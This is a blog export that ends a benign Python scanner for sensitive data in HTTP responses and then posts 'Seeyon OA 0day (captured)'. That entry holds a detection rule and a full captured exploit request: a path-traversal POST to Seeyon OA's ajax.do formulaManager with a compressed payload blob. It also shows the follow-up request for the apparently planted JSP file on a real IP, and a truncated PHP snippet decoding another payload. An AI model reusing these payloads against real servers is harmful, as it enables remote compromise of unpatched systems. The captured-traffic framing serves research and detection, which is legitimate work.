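COLOURS = {"internal_ip": "red", "email": "yellow", "phone": "green", "id_card": "green"}
PRECEDENCE = ("internal_ip", "email", "phone", "id_card")

# ISO 7064 MOD 11-2 check digit used by the 18-digit resident ID number.
ID_WEIGHTS = (7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2)
ID_CHECK = "10X98765432"


def id_checksum_ok(number: str) -> bool:
    """Reject 18-character strings whose check digit does not verify."""
    if len(number) != 18 or not number[:17].isdigit():
        return False
    total = sum(int(d) * w for d, w in zip(number[:17], ID_WEIGHTS))
    return ID_CHECK[total % 11] == number[17].upper()


def scan(text: str) -> dict:
    """Return {category: [unique values]} for every sensitive item found in text."""
    found = {}
    for name, pattern in PATTERNS.items():
        for match in pattern.finditer(text):
            value = match.group(1) if pattern.groups else match.group(0)
            category = name
            if name == "id_card" and not id_checksum_ok(value):
                continue
            if name == "ip":
                try:
                    addr = ipaddress.ip_address(value)
                except ValueError:      # e.g. a build string such as 1.2.3.999
                    continue
                category = "internal_ip" if addr.is_private else "ip"
            values = found.setdefault(category, [])
            if value not in values:
                values.append(value)
    return found


def highlight_colour(found: dict):
    """Colour for the HTTP history row, or None when only uncoloured kinds matched."""
    for category in PRECEDENCE:
        if category in found:
            return COLOURS[category]
    return None


# Constructed HTTP response used as sample input (not captured traffic).
SAMPLE_RESPONSE = """HTTP/1.1 200 OK
Content-Type: application/json

{"user":"alice@example.com","phone":"13800138000","idCard":"11010519491231002X",
 "server":"10.0.0.5","cdn":"8.8.8.8","api":"/api/v1/users","build":"1.2.3.999"}
<script>var password = "";</script>
"""

if __name__ == "__main__":
    hits = scan(SAMPLE_RESPONSE)
    for category, values in hits.items():
        print(f"{category}: {values}")
    print("highlight:", highlight_colour(hits))
```

<p>The lookarounds on the phone and ID patterns stop an 11-digit run inside an 18-digit ID number from being reported twice, and the <code>ipaddress</code> check is what separates the red "internal IP" case from an ordinary public address or a dotted version string.</p>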
]]></content>
<tags>
<tag>JAVA</tag>
</tags>
</entry>
<entry>
<title>Seeyon OA 0day (captured)</title>
<url>/2020/09/28/%E8%87%B4%E8%BF%9COA_0day(%E6%8D%95%E6%8D%89)/</url>
<content><![CDATA[<p>This article is for technical research and discussion only; use for any illegal purpose is strictly prohibited, and all consequences of doing so are borne by the user alone.</p>
<div style="text-align: right"> 小维</div>
<h4 id="概述"><a href="#概述" class="headerlink" title="概述"></a>Overview</h4><figure class="highlight livecodeserver"><table><tr><td class="code"><pre><span class="line"><span class="keyword">http</span> <span class="keyword">contains</span> <span class="string">"..;/"</span></span><br><span class="line"><span class="keyword">http</span>.request.uri == <span class="string">"/seeyon/SeeyonUpdate1.jspx"</span></span><br></pre></td></tr></table></figure>
<a id="more"></a>
<h4 id="payload"><a href="#payload" class="headerlink" title="payload"></a>payload</h4><figure class="highlight"><table><tr><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: </span><br><span class="line"><span class="attribute">Connection</span>: close</span><br><span class="line"><span class="attribute">Cache-Control</span>: max-age=0</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span>: 1</span><br><span class="line"><span class="attribute">User-Agent</span>: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52</span><br><span class="line"><span class="attribute">Accept</span>: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span><br><span class="line"><span class="attribute">Sec-Fetch-Site</span>: none</span><br><span class="line"><span class="attribute">Sec-Fetch-Mode</span>: navigate</span><br><span class="line"><span class="attribute">Sec-Fetch-User</span>: ?1</span><br><span class="line"><span class="attribute">Sec-Fetch-Dest</span>: document</span><br><span class="line"><span class="attribute">Accept-Encoding</span>: gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span>: zh-CN,zh;q=0.9</span><br><span class="line"><span class="attribute">Cookie</span>: JSESSIONID=7B6D8C106BD599DB0EF2F2E3B794A4FA; loginPageURL=; login_locale=zh_CN;</span><br><span class="line"><span class="attribute">Content-Type</span>: application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span>: 8819</span><br><span class="line"></span><br><span 
class="line">managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%82%C2%8Bv%C3%B4%C2%8C%C2%8D+c%C2%BB%13%7Bh_%C2%88%28*%28%C2%AF%C2%8D%3D%40%15Ba%15%C2%B0%C3%B2%10%C3%AC%C2%98%C3%BF%C2%BE%05%C3%98%C3%93%3D%C2%B1%C2%BDu%C2%A9%C3%8C%C2%AC%C3%8C%C2%AF%C3%B2%C3%BD%C3%97k%C3%B7%14_H%C2%8E%C2%9DC%C2%95x%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%A4%C2%96t3%2F%C3%8D%C2%BA%C3%AF%C3%A2y%C2%99%5C%C2%BC4EqT%3Fj%C3%99%05E%3E%C2%938Y%C3%80%C3%BC%C3%89t%C3%BA%C3%BD%C2%A7%C2%AB%C3%A7%3AI%C2%92%3E%C2%A5%C2%9EW%C3%85%C3%91S%C3%A7%C3%BB%C3%AFL%7B%7E%0B%C2%9D%C3%82%C3%A9%C2%A3%C2%B8%C2%BF%C2%A3%26%C2%99qA%C2%99wa%C2%92w%C2%9A%C2%A3%00%C2%91we%3EQ%C3%AB%C3%95%C3%B8%C2%8F%1D%C2%AD%C2%81%3C%26%C3%90%C3%89%C2%BCA%3FL%C2%93%C2%B2%C3%B3%C3%B0%13%C2%9E%C2%B9%C2%BB%C2%92%06%1E%C3%86%C2%B5%2F%3B1%C2%B9%C2%81YR%C2%B9%C3%9C%C2%98%C2%95%C2%96A%C3%A6%C2%8A%C3%82mKj%19%C2%8B%C2%9C%C2%A5%C3%8A%C2%82Y%5C%C2%AC%C2%B9%24%C2%80d%C2%9E%03%5E%C3%8F%C3%97D%29%5Cm%2C%1F%07%2F%C3%85Q%5CD%C2%B6%26%C3%B9%C2%90%C3%A8%15%C3%A0p%C3%A1%C2%86%2C%C3%9Ah%C3%83J%0A%C2%87%C3%8FN%C2%A4%5C%C2%B7DM%00%C3%91C%28b%C3%8E%C3%96%C2%84%C2%ABe%40%2C%C2%898%03%C3%A2%C2%B8%C2%825%3EYp%C2%96%26%0C%C3%A8%7B%C2%BAFq%C3%9A%C3%B0%C2%A6%C2%9F%5B%C3%BCJ%00K%C2%B5%C3%B8TFqmc%C2%93%C3%8BH*va%C3%B9%0F%C3%A0_%C2%BE%C3%99%C2%A2%1E%C2%BA%C3%A2%C2%A2%C2%B2L5q%C2%B9%C3%A1%C2%A3%24*%C2%A9e*7iq%C3%B4m3%60mC8%C2%83j2%C2%A3%3A7%C3%80%C2%96%C2%85e%C2%A8%18D%C2%99.%C3%8F%5B%C2%BD%C2%838%0E%28F%25%C2%89%C2%9B%C3%84%C3%A3%C2%95%01%C2%A0%C2%B4L%C3%A9-%3F%C2%B8Bc%C2%95%3A%C3%86%C3%86%C3%9Fse%00%C3%B8%C2%8DoW%01%C3%B2L%15K%C2%8B%0CZ%08%C2%8Fh%7C%2C4W%C2%B9%C2%B4l%C3%AD%C3%96D%C3%856%C3%81%C2%B9%7Dl%C2%B1eQJ7%C3%93%12%C2%ADI%C2%89%5D%02Ygz%1E%C2%9DL%C3%B6%C2%99%C3%A6%C2%B4%C3%8E%C3%BB%C3%996j%C2%BDU%40s%40%C3%B3w%C3%8F%5B%C2%A4%C2%84%C2%80%C3%A0%2B%14K%0Cg%C3%82%01.W%C2%89K%C2%80%C3%AF%C3%9CXd%1F%C3%B6%03%C3%BB%C2%B0%C2%A9%C2%B6%C2%86%C2%8D%C2%ADP%3Fo%0F%C3%92%C3%80B%C3%92%08p%C3%BA%C2%AD%C2%A9%01%12%C2%AE
%C3%90T%0D%C3%8B%28%07%C2%B6%C3%A6%23%C2%A8I%C2%A9S%C2%9DG%7B%0E_%C2%9D6%C3%86%C3%B1%1B%C2%BD%26%10%C3%839%C2%A6uU%03%C2%97%28X%C2%9E%C2%AE%26%C2%AA%C2%BEA%C3%B2%21%0B%C3%974%06%C3%87%C3%9C%C3%87%1BT%C3%A6%C2%B6%09%C3%BC%23%C2%A7%C2%87u%C2%AC%1A%C2%A7%0BG%7E%C2%82%C2%AD%C3%8A%C2%8F%3F%C3%BC%19%C3%99%C2%BF%C3%BE%C2%99%C3%88%C2%95%C2%84d%C2%AD%C2%91O%C3%AB%7C%C2%81%C3%8AO%C3%96o%C3%B8%C3%9Ay%C3%A4%12%C2%9D%C2%A7%C3%B5%C2%89%C2%A1%18%24%C2%A0j%C3%B4%C3%9A%C3%BA%C3%94z%C2%8D_%C2%BF%C3%96F%C2%9E%C2%9E%C2%A9%1C%C3%84V%25%C2%9C%5D%C3%96%C2%A6%C3%B9X%C2%A4%C2%B2%28%60XMn%C3%90%18%C3%A6%C2%AE%C2%81o%C3%B4m%C2%BA%C3%97%C2%95%C2%85%12%C2%AAs%C2%9A%C3%97%C3%A2n%C2%977%C3%BD%C3%81%C2%A9x%1F%C3%A9%C3%84%C2%A6%C2%BD*%2FW%18%C2%98%3A%06%C3%BC%3E%C2%B79%C2%9D%3D%12%C3%BD%C3%AD%C2%8F%1C%C3%944%C2%9D%5E%C2%97%1Cc%C3%AAgBc%C2%A0%C3%B1%C3%83%C2%95%1B%29%C2%ACe%08%21%C2%8D%C2%8F%C3%BA%C2%A1%C2%97%C3%90X%C2%A4%C2%A0%0A%C2%9A%C2%9E%C3%9Es%C3%A3%1C%C2%8A%C3%BA%10%C3%92%C3%9A%C3%AE%C2%A6%C3%A3%C2%A6%27%01%C2%A7T%C2%8E9a%5DQgw%C3%A1%C2%B5h%C3%AB%C2%BA*%5C%7E%C3%BF%C3%B8%3E%C3%ADL%C2%9AG%7D%C2%82R%C3%90%C2%9F%C2%BCh%C3%B3o%C3%83%C2%99%07bH%07%1E%C3%9E%C3%AFv%C3%96%3FW%C3%AA%C3%BDw%C2%AA%5B%C2%B3%3B%C3%93%C3%9A%C2%B6L%C3%AF%0E%C3%98o%C3%AFI%7E%3AQ%C2%80f%09%3C%7C%C3%A9%1C%0F%C2%8B%C2%AF%C3%8F%1F%C2%97%C3%84%C3%87%7D%C3%93o%18%1C%C3%B5%3E%C2%82%C3%BF%C2%9F.%C3%80q%C3%AAQ%C3%87%7E%7C%C2%AF%C3%B7%21%25%C2%A0wb%C3%92%C3%8C%C3%89%10%60%C3%8A%C2%B2%C3%AC%3D%C2%BCv%7F%C3%90%25I%17%C3%A5k%7Dg%C2%97%C3%9C%C3%AB%C3%BE%C3%BD%2FheA%C3%A4_%05%00%00</span><br></pre></td></tr></table></figure>
<figure class="highlight"><table><tr><td class="code"><pre><span class="line">HTTP/1.1 <span class="number">500</span> </span><br><span class="line"><span class="attribute">Pragma</span>: No-cache</span><br><span class="line"><span class="attribute">Cache-Control</span>: no-cache</span><br><span class="line"><span class="attribute">Expires</span>: Thu, 01 Jan 1970 00:00:00 GMT</span><br><span class="line"><span class="attribute">Content-Type</span>: application/json;charset=UTF-8</span><br><span class="line"><span class="attribute">Content-Length</span>: 51</span><br><span class="line"><span class="attribute">Date</span>: Wed, 16 Sep 2020 08:56:43 GMT</span><br><span class="line"><span class="attribute">Connection</span>: close</span><br><span class="line"><span class="attribute">Server</span>: SY8045</span><br><span class="line"><span class="attribute">Set-Cookie</span>: BIGipServer~CMEW-PRD-DMZ~pool_cmew-pms-lb_http80_CMEW-PRD-DMZ_prd=rd62o00000000000000000000ffff644e0303o80; path=/; Httponly</span><br><span class="line"></span><br><span class="line">{"message":null,"code":"0246603709","details":null}</span><br></pre></td></tr></table></figure>
<figure class="highlight yaml"><table><tr><td class="code"><pre><span class="line"><span class="string">GET</span> <span class="string">/seeyon/SeeyonUpdate1.jspx</span> <span class="string">HTTP/1.1</span></span><br><span class="line"><span class="attr">Host:</span> <span class="number">202.105</span><span class="number">.134</span><span class="number">.19</span></span><br><span class="line"><span class="attr">User-Agent:</span> <span class="string">Mozilla/5.0</span> <span class="string">(Macintosh;</span> <span class="string">Intel</span> <span class="string">Mac</span> <span class="string">OS</span> <span class="string">X</span> <span class="number">10.15</span><span class="string">;</span> <span class="string">rv:80.0)</span> <span class="string">Gecko/20100101</span> <span class="string">Firefox/80.0</span></span><br><span class="line"><span class="attr">Accept:</span> <span class="string">text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8</span></span><br><span class="line"><span class="attr">Accept-Language:</span> <span class="string">zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span></span><br><span class="line"><span class="attr">Accept-Encoding:</span> <span class="string">gzip,</span> <span class="string">deflate</span></span><br><span class="line"><span class="attr">Connection:</span> <span class="string">close</span></span><br><span class="line"><span class="attr">Cookie:</span> <span class="string">JSESSIONID=1EE0AC538A01698F6B502A186FABFEA8;</span> <span class="string">BIGipServer~CMEW-PRD-DMZ~pool_cmew-pms-lb_http80_CMEW-PRD-DMZ_prd=rd62o00000000000000000000ffff644e0303o80;</span> <span class="string">loginPageURL=</span></span><br><span class="line"><span class="attr">Upgrade-Insecure-Requests:</span> <span class="number">1</span></span><br></pre></td></tr></table></figure>
<figure class="highlight yaml"><table><tr><td class="code"><pre><span class="line"><span class="string">HTTP/1.1</span> <span class="number">200</span> </span><br><span class="line"><span class="attr">Content-Type:</span> <span class="string">text/html;charset=utf-8</span></span><br><span class="line"><span class="attr">Content-Length:</span> <span class="number">508</span></span><br><span class="line"><span class="attr">Date:</span> <span class="string">Wed,</span> <span class="number">16</span> <span class="string">Sep</span> <span class="number">2020</span> <span class="number">08</span><span class="string">:51:48</span> <span class="string">GMT</span></span><br><span class="line"><span class="attr">Connection:</span> <span class="string">close</span></span><br><span class="line"><span class="attr">Server:</span> <span class="string">SY8045</span></span><br></pre></td></tr></table></figure>
<h4 id="解密"><a href="#解密" class="headerlink" title="解密"></a>解密</h4><figure class="highlight perl"><table><tr><td class="code"><pre><span class="line"><?php $s = urldecode(<span class="string">"%1F%C2%8B%08%00%00%00%00%00%00%00%C2%B5X%5B%C2%93%C2%A2J%12%7E%C3%9E%C3%BD%15F%C2%BF%C3%B4L%C3%8Cl%0F%C2%A2%C3%8C%0C%7Bb%1ED%05%11%C2%A5%5B%C2%90%C3%AB%C3%86%3E%C3%88%C2%A5%01%29.%C3%93%C2%80%C2%8A%13%C3%A7%C2%BFo%16%17%C3%85%C3%96%C3%AE%C2%9D%C3%98%C3%98c%C2%84%21B%C2%91%C2%95%C2%95%C3%B9%7D_f%C3%95%C2%BF%7E%C3%9D%3F%27%2FQ%C2%816%C3%AB2u%C3%AF%C3%BF%C3%99%C3%AB%7F%C3%AE%C2%B5w%C3%84M%C2%84%C3%AF%C3%9C%C3%A7n%C2%96%C3%9F%C2%9FoO%0F%C3%A9%C2%8B%C2%9BeA%12%C3%A3%C2%87r%C3%BE%12%C3%84%5E%2F%C3%9D%C3%A4%7E%C3%AFG%C3%AF%C3%AE%C3%A1%C3%A1%C3%8B%C3%9E%C2%B56i%C2%9A%7D%C3%89%5C%C2%B7L%C3%A2%2Fw%7F%C3%BC%C2%BDW%7F%C3%BE%C2%B6%C3%9D%C3%AC6%0FA%C3%B2%C3%B0%04%C2%AF%C3%A4%C3%9AK%C2%90%C2%BB%2F%C2%BD%C3%B4%7CM%C2%82%C2%81%C3%98%C3%9D%C3%B7n%0C%C3%BB%C2%80%C3%AD%7F%C2%BA%C2%93%2B%C2%93J%C3%AAlr%C3%B7a%C2%9B%C2%A5%C2%87%C2%BB%C2%8F%27%C3%AB%C2%BD%C3%86%C2%93%C3%8Cw%11%C3%82%C2%AE%3Cq%C3%A9%C3%91%C2%9E%C2%A4%C2%A5E%C3%92%04%3F%C3%B3s%C2%8B%C2%A3%C2%8E%C2%8F%11%C2%BEG%04%C2%9B%C2%99D%C3%98%C2%93d%C2%B7+S%C3%9F%C2%89%C2%A6%C2%85%3DP%C2%8BE%24%C3%AE%2C%C2%99%16%C2%94%C3%BEh%C2%A7pll%C3%8A%C2%BC%C3%A7Dji%C2%93hgm%C2%89%60%29%0FK%7E%3B%C3%BC%C2%BE%C2%89%C3%85%C3%BDc%24%C2%A5v%C2%A4n%1D%0E%C2%91%C2%A6L%C3%AD%0D%C3%8DA%3C%C2%87r%C2%9B%C2%A3K%07%C3%9B%C2%8FX%C3%92%C2%90%C2%A9%3E%3C%C3%8F%16A%C2%92U%C3%BFu%C2%AF0%06s%C3%8A%C2%9EI%C2%BB%C2%9B%C3%B7%C3%80%C2%AE%C2%A9-%0B%21%C3%A0wO%C3%9B%C3%83O%7B0%C3%BAjr%C3%AA%C3%96%C3%A2%C3%98%C3%92%C3%90%C2%A5%C3%94%22%C2%87%C2%9F%C3%86%C2%AAH%C3%98%11*%C3%8C%C2%92%19%1A%C3%A5%C2%88%C3%A6%C3%87%3C%C2%B5%5C%C3%8F%C2%91q%C3%B4%C3%B6K%C2%92%2F%0DR%21%1E5%C2%85%C3%A0%C2%B7%C2%99%C3%87%C2%8FG%C2%9E2%C2%90%C3%8A%C2%8DF%C3%85%C3%BC%C2%8C%C3%B1%C3%AD%C3%81%C3%92%7B%C2%92G%C2%81%C2%A1%C2%8B%C2%A1%19%C3%A5%3FM%C3%9D%C3%B1M%C3%8E%08%1E%C3%8B%11%C2%8Ce%C3%96%C3%8El%C2%9EZ%C2%9
1%C3%ADY%C3%9A%C2%AA%C3%8FO%C2%88%C3%AAWh%C3%9E%13%C2%AA%C3%B9%C3%82o%C3%98%26%C3%8F%C2%89%19%C3%988%C3%B2%C2%AC%C3%A7%C2%99%C2%BAO%C2%98%1A%15%C3%9A%253%01%3F%C2%8F6q%C3%98%19%C2%9A%C2%84%C3%AC%C2%80%C2%A9%C3%87V_f%C3%AFh%C3%B3l%C2%A3-%3Dm%C3%AC%C2%BF%1E%C3%B7U%C2%90%C2%BBc%C3%AB%2F%C3%A4co%C3%AA%7C%C3%A2%06a%C3%97%0E%7D%C3%8B%C3%A6%C2%8A%3CT%3E*%C2%B2%1F%C2%B8%C2%BA%C2%84%C2%B4%3E%C3%A1%19%24%C2%9F%C3%B2%C2%B3%C3%8C%C2%BB%C2%B4%C3%8B%C2%94%C2%A6.%C3%B5%C3%ADh%C3%98%C3%9A%2F+%C2%BE%11%C3%84%0756%12x%2F%C3%A3%27%C2%A3%0C%C3%96%18%2C%C2%A2%03%C2%B2%22%C2%87%C3%98%C2%8Co%C3%B80%23j%3Fgj%60qh%C3%8Bss%C3%8A%C3%A1TK%C2%97%C2%99%C2%A1p%C2%BE%3E.%C3%86L%00%C3%B8%C3%8BL%C2%8D-x%C2%8E%C2%B8%C3%B4i%26%C2%95%C3%AE%C2%8D%C2%B5_%C3%A1%22%14S%C2%9B%C3%B3q%C2%AC%C2%B68%2Fo%3F%C2%A7bX%C3%9F%C3%9C%C2%8AE%C3%82%C3%90%C2%A8%C2%AD%29%7B%C3%81JQ%C3%97%C3%BCE%0C%C3%AB%C2%AFQR%C2%90kD%08%1C%C3%A1%3D%C2%95%C2%A3%03%3FI%C2%BCe%C2%B0%C3%B7%C2%ACH%1D%C3%B0%1C%C3%A6%04%3B%04%3E%C2%94%C2%AE%C3%8E%10VI%1Dm%C3%80%C3%A1%02%C2%89%08%C3%A6D%C3%8E4G%C2%AEZa5q%C2%B9ea%C2%92*%C2%B1%C2%8A%11a%C3%AA%C3%8BD%C2%90%C3%B7%1E%1F%C2%B2%C2%ACR%C3%B2%C2%A9%C2%B0%7E%3B%C3%BE0%7Fh%11%26%C3%B8%C3%80f%C3%82l%C2%99%C3%96%18%C2%AC%C2%BF%C3%8F2%C2%B3%05%C2%BCo7%C3%A3Q%22%C3%A9%C3%BE%C3%96%04%1F6%1A%0D%C3%B1S%C3%9E%C3%8D%C2%A9%15%C2%AB%C2%995%C3%A9%C3%86%C2%97h%C3%AC%5D%C3%A2%C3%85%1EH%C2%BE%C2%83s%C3%86%C2%9E%C2%B8%C2%94%C2%9B%13%259sey9%C3%8Fy%1C%C3%8C%C2%B5%02%0E1%C2%85%C2%A3%1D%C2%B2%C2%AE%C3%8F%C3%80%1D%C3%AA%C2%86o%3F%0D%C3%9D%C3%B4%C2%81%C3%97%107%C2%B5%C3%9C%C3%A8%12%C2%B5%08%C3%BB%C3%88%1E%C2%88%3E%C3%84l%C2%BA%01%C3%8D%C2%B0%07%2B%C3%8F%C2%BA%C2%8ES%7E%C3%8A%C2%B3L%1DMM%C2%84%C3%B5%21%C3%82%C2%95%29%C3%91%04%C3%9Ea%C2%AD%C2%918%04%C2%B9%16%C2%89E%C3%A4%40%3EP%C2%81%C3%97dE%22%12%C3%86sQ%C2%9A%28%C3%81%C2%8D%C3%98%C3%A7%C2%8B%180%C3%8F%C2%B1%C2%84%29%C3%BB%C3%87%C3%BA%C2%BD%0A%C2%A7Ga%1C%C3%96%C2%98%C2%9F-%0B%C2%8BS%0Bs+%25p%C3%AF%22%27u%3C%21%C3%B7c%C3%90%1C%C2%8EBN%C3%99%C2%AC-%C3%AAC%2C%C2%BDb%15%C2%A1X%C3%9
6%28%C3%90%02XS%C3%A0%1D%16x%3E%C3%90HX%C3%A7%C3%91%19%7B%C2%A9+S%C2%84%C3%95o%C3%A3%C3%A8%1D%C3%84+%2C%1C%C2%8EV%C3%AD%19%C2%83%C3%ACP%C3%B4mRI.%7C%C2%9Ea%0E%C2%B3%C2%84Az%C2%9E0U%C2%87%06%C2%A9%C3%AE%21g%3B%2B%60%C3%90%C2%A5%5E%5Ch%C3%82%C2%99%C3%9F%C2%91J4%C2%BA%C3%96%C3%B0%C2%95%C3%A9%1B%C3%91%215J%C3%A6%C3%A8%40%0C0%0EN%C3%B9%C3%A6%C3%A6x%7ER%C2%9C%C2%AA%C2%85A%C3%92%C2%A1%C3%99%C3%95%C2%91%18cAJ%C3%AC%C2%88%1E%C2%80%C3%86%C2%B1.%27%22%C3%A0%1C%C3%96b%C3%8F%C3%AD%C3%84%C2%A7%C3%95+%23b%C2%8F%C3%A6%C3%9A+%C2%BA%C2%B1%3B%C3%A3%C3%8A%C3%B4%C2%AD%C2%99%C2%8A*m%C2%BD%C3%82%C3%AAm-h%C3%AD%C3%A1w%C2%9A9%0A3%C2%A2%C3%8Bu%C3%84%C3%A6%C2%98%C3%9F%17u%26l%C3%961%C3%A6%C2%AFs7%C2%A5a%2C%C3%94%C2%AB1%C3%83%02Nv%C2%A0%7B%25%C2%B6%C3%99%C3%9A%C2%AF%C3%B1%C3%90G%0E%C3%A7%C3%AF%C3%8C%C2%B1%17%60NK%C2%A0%21%16%C2%895%1A4%C2%91%C2%A3%C3%BA%16%C2%B7O%17%C2%90%3F%27%C2%A2_p%C2%8C%C2%A0%06+q%C2%BB%3A%3D%C2%BB%C3%86%C3%8By%C2%BD%C3%82%C2%89C%C2%A1w%C2%B6%5B%C3%A9U%5D%0FJ%2F%C2%BD%C3%B2%C2%A1%19%C2%A7rt%5B%C2%9B%02%C3%80U%01u%C2%AB%7E%C2%A7%C2%9F%3B.%C3%99j-%C2%B5%C2%AD%C3%AE%0D%C2%88%C2%AE%C2%8F%C2%A7%C2%B5%C3%96%C3%AF%C3%99%C3%9E%C2%9A%C2%9C%C3%BF%04%3E%11Z%C2%BF%C3%BF%C3%8D%C2%88E%C3%BA%7F%C3%83%C3%9C%7B%C2%9C%C3%BF%C2%BD%C2%BC%C3%95%C3%BDF%3F%C2%B5%C3%89e%C2%B1%0A%C3%99%C2%B5%04c%3B%C3%B1%C2%BE%C2%8Ee%C2%8D%C3%AF%27%23JAKV%C2%9D%18b%3E%C2%B6y%C2%A7pl%C2%BA%C3%BA%C3%BF%C2%96%1D%C3%92%C3%90%0E%7DS%C3%86%C3%BD%C2%83%C3%9F%C3%866%C3%A5%5B%C3%BC%C3%A3%C2%BA%C2%885%C2%BD%C2%A9%C2%89%C3%80%5D%C2%9C%27%C3%90%1E%29%C2%B1%C3%88U%C3%82G-O*%5C%60-%C3%B8k%C3%B2%C3%91%C2%8D5%C3%94%09GS%C2%B0%C3%B66%C2%BES%C3%80u%263%C2%B4J%C3%B3l%0Bct%C3%8C%07%C3%82%C2%AB%C3%BBv%7B%C3%BFZ%0F%21n%22h%C2%97%C2%98%40%0C.xm%C2%AEo%C3%B6%0E%C3%B4%1B%C3%97%27%C3%8Di%7C%C3%BCv%C2%B3%3F%C2%98AN%C2%A0%C2%87%03%C3%BD9kK%C2%83%11%09%C3%B7x%C2%90%C3%8B3G%C2%98%C3%80%06%C2%9E%00%0FJk%C3%A0%1C%C3%B9K%2Cv%C2%B5%C2%AF%C3%A1%0E%C3%93r%C2%B1%C3%BB%C3%AC4O%27v%C2%BF%5B%C2%B7Z%7B%C3%B8%C2%9Df%0E*%C2%B2%06%C3%B3GC%C3%AB%C3%A3%C2%B8
6uM%05%1D%C3%9D%C2%83%C3%B67X%C2%BF%C3%91g%C2%B4%C3%B9%C3%A59%095%C3%98%C3%826%5B%C3%BB%15%C3%8E%C3%96%1A%C3%98%C3%A1%C3%A8%10%C3%ACb%C2%9CMa%7C%C2%ADO%C2%B8%1F%C3%81%3A9%0E%0B%C3%90O%C3%92%22s%24%C2%9C%C2%B0%7Ezv%C3%8D%C3%8B%C3%93zG%C2%89%C2%81%C3%BB%125w%C2%80%C2%BFak%C2%B7%C3%96%C2%99%C2%BA%C2%87%C2%85%3A%C3%B7%C3%9A%C2%87f%C2%9C%12%C2%B4%18%C2%ADy+Z%C2%BA%C2%9E%C2%B7%5C%01%C3%BCW%C3%B7h%C3%80%5Bj%C3%85%C3%A6n%03%C3%B5%C3%8Bl%C3%B2h%C2%B7%7DT%C2%AB%C2%B9l%C3%85%C2%8B%C3%A3%C2%B3%C3%BC%C2%AA%C2%8F%7C%0B%7FrxQ%5B%C3%9E%C2%AB%0F%C3%95%C3%B7%14%13%C3%A0s%C2%B3%C2%AEEd%C3%AE%C3%AC%C2%90%C3%B2-MI%C3%B8X%C3%AC%5B%01%C2%95otq%0B5%C2%82Q%08%5C%C3%ABN%C3%B9%C2%B8%C3%81%C2%8D%C3%9F%C3%8B%1D%5E%23%C3%94%7C%5CO%21%1E%C2%AF%C3%AA%C3%B7%C3%BF%3D%1F%C3%AA%C3%98%C3%91%C3%8C%08%C3%BB%C3%BB%C3%97%C3%A6%C3%A5%C2%BF%C3%B6%C2%A0%C3%A5%C2%ADZP%C3%B7%C2%98%C3%97%C3%97%C2%B8%0Fq%C3%B4y%C3%91%C3%96%C3%82%C2%B6%27y%1A%C3%937%C3%B7w%C3%8D%C2%9E%C3%B5%08%7Dv%0Ax%C3%88%C2%A0%C3%9F%C3%BC%C3%94%C3%A5h%1B%3F%C3%88%09%60g%C3%9A%C3%89G%C3%8B%1B%05z%15%C3%B5%C3%A0h%C2%B8%C3%AF%C2%AAt%7Be%C3%A8s%C3%80%C2%81J%C3%A0%C3%BD%C2%94%5Dq%C2%B9%C3%AD%C3%AD%C2%98%10%C3%A6%C3%B5q%C2%8Dr%C3%87%7Eu%0D%C2%B1%C2%8D%40_%C2%8Ff%1B%13%0EE%C2%80%C3%8F%23%C3%AE%3B%C3%B1%C3%BA%C3%AB%5C%C2%B1%04%C2%8E%C2%B7%01%C3%BC%C2%AFj%19%C3%87R%16G%C3%BB%26%C3%B4%1D%60%C2%8Bn%C3%BB%C2%81%C3%8B%C2%BD%C2%8E%C2%88%C3%BB%5E%C2%BC%C3%86%C3%82%C3%86%C2%B5E%C2%97%C2%B0%C3%96%05%0Eh%14%C3%A4xo%C3%A8%28%C2%B3H6%C3%A4%C3%9B%1C%C2%B1%1E%C3%B656%15%C3%98%C2%93%C3%87%12rg%C2%AB%5B5%C3%A9%C3%95%5E%C2%B2%C3%AA3%25%C2%A1%C2%8E%C3%8Di%C3%BF%01%C2%B9D%16%C3%8C%7F%C3%A9%C3%8F%1C%C3%99%C2%BA%C2%8A%C3%BB%C3%AF7%C3%BCic6%3F%C2%9E%7Dj%C3%B5%C2%B9%C2%8E%C2%95p%C3%89%C3%A7Sm6qM%1E%7BI%C3%A3k%C3%9A%5D%C2%BB%C3%B9%C3%AE%C3%9AC%C2%A8%C2%95PO%C2%89n%3F%7F1G%C2%B4%C2%A8r%C3%8Bfv%C3%A9Wg%0E%2B%C2%92%C2%86%3EZ%1D%3A%C2%97%C3%A3%C2%A0%26%C2%89%7B%C2%8B%C2%84%C2%BDC%1D%27%1D%C3%AF%1Fp%C3%BE%21%3E%C2%83%C3%AAZ%C3%B6%C3%B1%C2%9E%07%C2%9F%7B%40%2FR%C3%B7%C2%A7%02%C3%9E
